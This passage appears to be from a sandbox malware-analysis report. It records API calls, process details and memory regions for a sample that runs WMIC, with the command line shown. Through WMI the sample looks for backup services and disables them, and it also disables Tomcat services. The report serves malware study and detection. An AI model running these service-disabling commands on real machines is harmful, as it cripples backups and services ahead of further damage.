Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0119.704] CloseHandle (hObject=0x270) returned 1 [0119.704] lstrlenW (lpString="GET") returned 3 [0119.704] lstrlenW (lpString="CALL") returned 4 [0119.704] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0119.704] lstrlenW (lpString="LIST") returned 4 [0119.704] lstrlenW (lpString="CALL") returned 4 [0119.704] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0119.705] lstrlenW (lpString="SET") returned 3 [0119.705] lstrlenW (lpString="CALL") returned 4 [0119.705] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0119.705] lstrlenW (lpString="CALL") returned 4 [0119.705] lstrlenW (lpString="CALL") returned 4 [0119.705] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0119.705] ??0CHString@@QAE@XZ () returned 0xecfadc [0119.705] GetCurrentThreadId () returned 0x9cc [0119.705] SysStringLen (param_1="\\\\") returned 0x2 [0119.705] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0119.705] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0119.705] SysStringLen (param_1="\\") returned 0x1 [0119.705] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0119.705] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0119.705] WbemLocator:IWbemLocator:ConnectServer (in: This=0xfa74f8, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xfd0af0) returned 0x0 [0119.710] CoSetProxyBlanket (pProxy=0xfd0af0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0119.711] ??1CHString@@QAE@XZ () returned 0x74a66430 [0119.711] ??0CHString@@QAE@XZ () returned 0xecfad8 [0119.711] GetCurrentThreadId () returned 0x9cc [0119.711] lstrlenA (lpString="") returned 0 [0119.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x11e11a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0119.711] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0119.711] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0119.711] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x275608e0 | out: _String="Select", _Context=0x275608e0) returned="Select" [0119.711] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x275608e0 | out: _String=0x0, _Context=0x275608e0) returned="*" [0119.711] lstrlenW (lpString="FROM") returned 4 [0119.711] lstrlenW (lpString="*") returned 1 [0119.711] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0119.711] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x275608e0 | out: _String=0x0, _Context=0x275608e0) returned="from" [0119.711] lstrlenW (lpString="FROM") returned 4 [0119.711] lstrlenW (lpString="from") returned 4 [0119.711] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0119.711] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x275608e0 | out: _String=0x0, _Context=0x275608e0) returned="Win32_Service" [0119.711] IWbemServices:GetObject (in: This=0xfd0af0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xecfab0*=0x0, ppCallResult=0x0 | out: ppObject=0xecfab0*=0x102add8, ppCallResult=0x0) returned 0x0 [0119.740] IWbemClassObject:GetMethod (in: This=0x102add8, wszName="ChangeStartMode", lFlags=0, ppInSignature=0xecfabc, ppOutSignature=0xecfaa8 | out: ppInSignature=0xecfabc*=0x102b2c8, ppOutSignature=0xecfaa8*=0x102b648) returned 0x0 [0119.740] IWbemClassObject:SpawnInstance (in: This=0x102b2c8, lFlags=0, ppNewInstance=0xecfac8 | out: ppNewInstance=0xecfac8*=0x102b840) returned 0x0 [0119.741] IWbemClassObject:GetNames (in: This=0x102b2c8, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0xecfacc | out: pNames=0xecfacc*="\x01ƀ\x04") returned 0x0 [0119.741] SafeArrayGetLBound (in: psa=0xfdf540, nDim=0x1, plLbound=0xecfa78 | out: plLbound=0xecfa78) returned 0x0 [0119.741] SafeArrayGetUBound (in: psa=0xfdf540, nDim=0x1, plUbound=0xecfac0 | out: plUbound=0xecfac0) returned 0x0 [0119.741] SafeArrayGetElement (in: psa=0xfdf540, rgIndices=0xecfab4, pv=0xecfadc | out: pv=0xecfadc) returned 0x0 [0119.741] IWbemClassObject:GetPropertyQualifierSet (in: This=0x102b840, wszProperty="StartMode", ppQualSet=0xecf99c | out: ppQualSet=0xecf99c*=0xfddc70) returned 0x0 [0119.741] IWbemQualifierSet:Get (in: This=0xfddc70, wszName="CIMTYPE", lFlags=0, pVal=0xecf96c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xecf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0119.741] IWbemClassObject:Get (in: This=0x102b840, wszName="StartMode", lFlags=0, pVal=0xecf944*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xecf980*=15530344, plFlavor=0x0 | out: pVal=0xecf944*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0xecf980*=8, plFlavor=0x0) returned 0x0 [0119.741] IWbemQualifierSet:Get (in: This=0xfddc70, wszName="read", lFlags=0, pVal=0xecf984*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xecf984*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0119.741] IWbemQualifierSet:Get (in: This=0xfddc70, wszName="write", lFlags=0, pVal=0xecf984*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xecf984*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0119.741] IWbemQualifierSet:Get (in: This=0xfddc70, wszName="Description", lFlags=0, pVal=0xecf95c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xecf95c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0119.741] lstrlenA (lpString="Not Available") returned 13 [0119.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301d64, cbMultiByte=-1, lpWideCharStr=0x11e9288, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0119.741] IUnknown:Release (This=0xfddc70) returned 0x0 [0119.742] lstrlenW (lpString="StartMode") returned 9 [0119.742] lstrlenW (lpString="StartMode") returned 9 [0119.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="StartMode", cchCount1=9, lpString2="StartMode", cchCount2=9) returned 2 [0119.742] SysStringLen (param_1="In") returned 0x2 [0119.742] SysStringLen (param_1="MaxLen") returned 0x6 [0119.742] SysStringLen (param_1="ValueMap") returned 0x8 [0119.742] SysStringLen (param_1="MaxLen") returned 0x6 [0119.742] SysStringLen (param_1="MaxLen") returned 0x6 [0119.742] SysStringLen (param_1="ValueMap") returned 0x8 [0119.742] lstrlenW (lpString="") returned 0 [0119.742] lstrlenW (lpString="STRING") returned 6 [0119.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0119.742] lstrlenW (lpString="string") returned 6 [0119.742] lstrlenW (lpString="STRING") returned 6 [0119.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0119.742] SysStringLen (param_1="In") returned 0x2 [0119.742] SysStringLen (param_1="ValueMap") returned 0x8 [0119.742] SysStringLen (param_1="ValueMap") returned 0x8 [0119.742] SysStringLen (param_1="ValueMap") returned 0x8 [0119.742] SysStringLen (param_1="ValueMap") returned 0x8 [0119.742] SysStringLen (param_1="ValueMap") returned 0x8 [0119.742] lstrlenW (lpString="Boot") returned 4 [0119.742] lstrlenW (lpString="Disabled") returned 8 [0119.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Boot", cchCount2=4) returned 3 [0119.742] lstrlenW (lpString="System") returned 6 [0119.742] lstrlenW (lpString="Disabled") returned 8 [0119.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="System", cchCount2=6) returned 1 [0119.742] lstrlenW (lpString="Automatic") returned 9 [0119.742] lstrlenW (lpString="Disabled") returned 8 [0119.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Automatic", cchCount2=9) returned 3 [0119.742] lstrlenW (lpString="Manual") returned 6 [0119.742] lstrlenW (lpString="Disabled") returned 8 [0119.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Manual", cchCount2=6) returned 1 [0119.742] lstrlenW (lpString="Disabled") returned 8 [0119.742] lstrlenW (lpString="Disabled") returned 8 [0119.742] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Disabled", cchCount2=8) returned 2 [0119.743] IWbemClassObject:GetPropertyQualifierSet (in: This=0x102b840, wszProperty="StartMode", ppQualSet=0xecf9a4 | out: ppQualSet=0xecf9a4*=0xfddab8) returned 0x0 [0119.743] IWbemQualifierSet:Get (in: This=0xfddab8, wszName="CIMTYPE", lFlags=0, pVal=0xecf988*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xecf988*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0119.743] IWbemClassObject:Get (in: This=0x102b840, wszName="StartMode", lFlags=0, pVal=0xecf978*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xecf998*=15529752, plFlavor=0x0 | out: pVal=0xecf978*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0xecf998*=8, plFlavor=0x0) returned 0x0 [0119.743] IUnknown:Release (This=0xfddab8) returned 0x0 [0119.743] lstrlenW (lpString="string") returned 6 [0119.743] lstrlenW (lpString="string") returned 6 [0119.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0119.743] IWbemClassObject:Put (This=0x102b840, wszName="StartMode", lFlags=0, pVal=0xecfa3c*(varType=0x8, wReserved1=0x0, wReserved2=0x6, wReserved3=0x0, varVal1="Disabled", varVal2=0x76a14aa9), Type=0) returned 0x0 [0119.743] IUnknown:Release (This=0x102b2c8) returned 0x0 [0119.743] IUnknown:Release (This=0x102b648) returned 0x0 [0119.743] IUnknown:Release (This=0x102add8) returned 0x0 [0119.744] ??0CHString@@QAE@XZ () returned 0xecf988 [0119.744] GetCurrentThreadId () returned 0x9cc [0119.744] lstrlenA (lpString="") returned 0 [0119.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x11e9c40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0119.744] lstrlenA (lpString="") returned 0 [0119.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x11e9c40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0119.744] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0119.744] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0119.744] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x27560818 | out: _String="Select", _Context=0x27560818) returned="Select" [0119.745] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x27560818 | out: _String=0x0, _Context=0x27560818) returned="*" [0119.745] lstrlenW (lpString="FROM") returned 4 [0119.745] lstrlenW (lpString="*") returned 1 [0119.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0119.745] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x27560818 | out: _String=0x0, _Context=0x27560818) returned="from" [0119.745] lstrlenW (lpString="FROM") returned 4 [0119.745] lstrlenW (lpString="from") returned 4 [0119.745] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0119.745] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x27560818 | out: _String=0x0, _Context=0x27560818) returned="Win32_Service" [0119.745] lstrlenA (lpString="SELECT * FROM ") returned 14 [0119.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x11e9c40, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0119.745] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0119.745] SysStringLen (param_1="Win32_Service") returned 0xd [0119.745] lstrlenA (lpString=" WHERE ") returned 7 [0119.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x11e8f50, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0119.745] SysStringLen (param_1=" WHERE ") returned 0x7 [0119.745] SysStringLen (param_1="caption LIKE '%BACKP%'") returned 0x16 [0119.745] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0119.745] SysStringLen (param_1=" WHERE caption LIKE '%BACKP%'") returned 0x1d [0119.746] IWbemServices:ExecQuery (in: This=0xfd0af0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%BACKP%'", lFlags=48, pCtx=0x0, ppEnum=0xecf990 | out: ppEnum=0xecf990*=0x102bf68) returned 0x0 [0119.763] CoSetProxyBlanket (pProxy=0x102bf68, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0119.808] IEnumWbemClassObject:Next (in: This=0x102bf68, lTimeout=-1, uCount=0x1, apObjects=0xecf994, puReturned=0xecf980 | out: apObjects=0xecf994*=0x0, puReturned=0xecf980*=0x0) returned 0x1 [0120.225] IUnknown:Release (This=0x102bf68) returned 0x0 [0120.226] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.226] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.226] GetCurrentThreadId () returned 0x9cc [0120.226] ??0CHString@@QAE@PBG@Z () returned 0xecfb4c [0120.226] ??YCHString@@QAEABV0@PBG@Z () returned 0xecfb4c [0120.226] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x11ea0c8, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0120.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0120.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x11e9c40, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0120.227] __iob_func () returned 0x77ac1208 [0120.227] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0120.227] __iob_func () returned 0x77ac1208 [0120.227] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0120.227] ??1CHString@@QAE@XZ () returned 0x1 [0120.227] IUnknown:Release (This=0xfd0af0) returned 0x0 [0120.228] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0120.228] _kbhit () returned 0x0 [0120.229] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0120.229] WbemLocator:IUnknown:Release (This=0xfa74f8) returned 0x2 [0120.229] IUnknown:Release (This=0xfd0a50) returned 0x0 [0120.229] IUnknown:Release (This=0xfd0820) returned 0x0 [0120.230] WbemLocator:IUnknown:Release (This=0xfa74f8) returned 0x1 [0120.230] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0120.230] WbemLocator:IUnknown:Release (This=0xfa74f8) returned 0x0 [0120.231] CoUninitialize () [0120.245] exit (_Code=0) [0120.245] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.245] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 303 os_tid = 0xf0 Thread: id = 304 os_tid = 0x778 Thread: id = 305 os_tid = 0x8bc Thread: id = 306 os_tid = 0x168 Process: id = "70" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3fd6d000" os_pid = "0xc38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4578 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4579 start_va = 0xb30000 end_va = 0x4b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 4580 start_va = 0x4b30000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 4581 start_va = 0x4b50000 end_va = 0x4b51fff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 4582 start_va = 0x4b60000 end_va = 0x4b73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b60000" filename = "" Region: id = 4583 start_va = 0x4b80000 end_va = 0x4bbffff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 4584 start_va = 0x4bc0000 end_va = 0x4cbffff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 4585 start_va = 0x4cc0000 end_va = 0x4cc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cc0000" filename = "" Region: id = 4586 start_va = 0x4cd0000 end_va = 0x4cd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cd0000" filename = "" Region: id = 4587 start_va = 0x4ce0000 end_va = 0x4ce1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 4588 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4589 start_va = 0x7f4c0000 end_va = 0x7f4e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4c0000" filename = "" Region: id = 4590 start_va = 0x7f4e8000 end_va = 0x7f4eafff entry_point = 0x0 region_type = private name = "private_0x000000007f4e8000" filename = "" Region: id = 4591 start_va = 0x7f4eb000 end_va = 0x7f4ebfff entry_point = 0x0 region_type = private name = "private_0x000000007f4eb000" filename = "" Region: id = 4592 start_va = 0x7f4ed000 end_va = 0x7f4edfff entry_point = 0x0 region_type = private name = "private_0x000000007f4ed000" filename = "" Region: id = 4593 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4594 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4595 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4596 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4597 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4598 start_va = 0x4cf0000 end_va = 0x4cfffff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 4599 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4600 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4601 start_va = 0x4d10000 end_va = 0x4e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d10000" filename = "" Region: id = 4602 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4643 start_va = 0x4b30000 end_va = 0x4b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b30000" filename = "" Region: id = 4644 start_va = 0x4e10000 end_va = 0x4ecdfff entry_point = 0x4e10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4645 start_va = 0x4ed0000 end_va = 0x4f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 4646 start_va = 0x4f10000 end_va = 0x500ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 4647 start_va = 0x5040000 end_va = 0x504ffff entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 4648 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4649 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4650 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4651 start_va = 0x7f3c0000 end_va = 0x7f4bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3c0000" filename = "" Region: id = 4652 start_va = 0x7f4e5000 end_va = 0x7f4e7fff entry_point = 0x0 region_type = private name = "private_0x000000007f4e5000" filename = "" Region: id = 4653 start_va = 0x4b40000 end_va = 0x4b43fff entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 4654 start_va = 0x4b50000 end_va = 0x4b53fff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 4655 start_va = 0x5050000 end_va = 0x5386fff entry_point = 0x5050000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 307 os_tid = 0xc24 [0120.410] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0120.410] __set_app_type (_Type=0x1) [0120.410] __p__fmode () returned 0x77ac4d6c [0120.410] __p__commode () returned 0x77ac5b1c [0120.410] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0120.410] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0120.410] GetCurrentThreadId () returned 0xc24 [0120.410] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc24) returned 0x84 [0120.410] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0120.410] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0120.410] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.413] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.413] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4cbfae4 | out: phkResult=0x4cbfae4*=0x0) returned 0x2 [0120.413] VirtualQuery (in: lpAddress=0x4cbfaeb, lpBuffer=0x4cbfa9c, dwLength=0x1c | out: lpBuffer=0x4cbfa9c*(BaseAddress=0x4cbf000, AllocationBase=0x4bc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.413] VirtualQuery (in: lpAddress=0x4bc0000, lpBuffer=0x4cbfa9c, dwLength=0x1c | out: lpBuffer=0x4cbfa9c*(BaseAddress=0x4bc0000, AllocationBase=0x4bc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0120.413] VirtualQuery (in: lpAddress=0x4bc1000, lpBuffer=0x4cbfa9c, dwLength=0x1c | out: lpBuffer=0x4cbfa9c*(BaseAddress=0x4bc1000, AllocationBase=0x4bc0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0120.413] VirtualQuery (in: lpAddress=0x4bc3000, lpBuffer=0x4cbfa9c, dwLength=0x1c | out: lpBuffer=0x4cbfa9c*(BaseAddress=0x4bc3000, AllocationBase=0x4bc0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.413] VirtualQuery (in: lpAddress=0x4cc0000, lpBuffer=0x4cbfa9c, dwLength=0x1c | out: 